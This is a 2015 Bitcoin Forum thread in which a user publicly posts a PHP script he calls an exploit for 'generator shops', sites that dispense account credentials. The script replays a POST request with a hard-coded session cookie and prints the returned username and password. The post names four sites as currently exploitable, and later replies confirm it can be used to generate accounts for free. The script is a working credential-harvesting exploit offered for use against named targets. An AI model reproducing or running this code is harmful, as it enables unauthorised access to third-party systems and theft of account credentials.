Bitcoin Forum

Economy => Service Discussion => Topic started by: bobc1994 on September 28, 2015, 05:34:31 PM


Title: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 05:34:31 PM
Hey guys so I have been contacting multiple gen shop owners of this exploit but they either become very defensive or just ends up trying to make lies. Then they begin to act very rude to me.

Update: after this announcement owner of script gave up and doesn't know how to fix the script lol

I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.

Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.

There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here

Alright so the exploit is a php code that you can host anywhere. Don't bother asking me on how to use this as you must already know what this does and how to use it.

The new owner of this source has been lying to members that this was a v1 exploit but it still works on v2 and the new owner has never updated the source at all! all he did was rename it which can be confirmed by talking to the original owner.

Code:
<?
if($_GET['auth']=="max"){
$url = '';

$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  =>   "Host: 
" .
                "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
                "X-Requested-With: XMLHttpRequest
" .
                "Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D


",
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>



Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com

also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and its not the ones above.

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: flystarjay on September 28, 2015, 05:41:51 PM
https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 05:44:41 PM
Quote from: flystarjay on September 28, 2015, 05:41:51 PM
https://bitcointalk.org/index.php?topic=1194832.msg12540096#msg12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: Bluffer on September 28, 2015, 06:01:21 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 06:04:32 PM
Quote from: Bluffer on September 28, 2015, 06:01:21 PM
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took to long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

You own a shop too?

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: Bluffer on September 28, 2015, 06:27:37 PM
I do run the best generator on Hackforums, yep.

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 06:52:04 PM
Quote from: Bluffer on September 28, 2015, 06:27:37 PM
I do run the best generator on Hackforums, yep.


alright hit u up a pm

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: tifossi on September 28, 2015, 07:40:34 PM
Is it possible with this exploit that people can generate accounts for free?

Title: Re: Public Announcement for Digital Goods Generator shops. Exploit
Post by: bobc1994 on September 28, 2015, 09:42:38 PM
Quote from: tifossi on September 28, 2015, 07:40:34 PM
Is it possible with this exploit that people can generate accounts for free?

yeah you can do a lot...

https://bitcointalk.org/index.php?topic=1148789.msg12546237#msg12546237


Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines